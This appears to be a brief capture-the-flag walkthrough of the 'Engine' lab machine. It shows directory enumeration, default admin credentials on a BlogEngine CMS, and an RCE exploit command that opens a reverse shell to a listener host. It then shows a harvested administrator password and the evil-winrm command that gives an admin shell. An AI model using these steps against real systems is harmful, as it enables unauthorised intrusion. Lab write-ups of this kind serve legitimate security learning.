172.31.1.16

CyberSec Labs Engine Walkthrough

Port 80 open

Gobuster finds a directory /blog

It is blogengine cms which is not configured properly and has default creds admin:admin

There’s an RCE exploit available for the same

Python exploit.py –t 172.31.1.16/blog –l 10.10.0.51:920\

For the proxy we can turn burpsuit on and can send the payload through burpsuit.

After running the exploit we ge the shell back.

Running winpeas some autologin creds are found

Administrator:PzCEKhvj6gQMk7kA

Using evil-winrm we can get a admin shell

evil-winrm -u administrator -p “PzCEKhvj6gQMk7kA” -i 172.31.1.16

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami

engine\administrator

Author

Sentinal920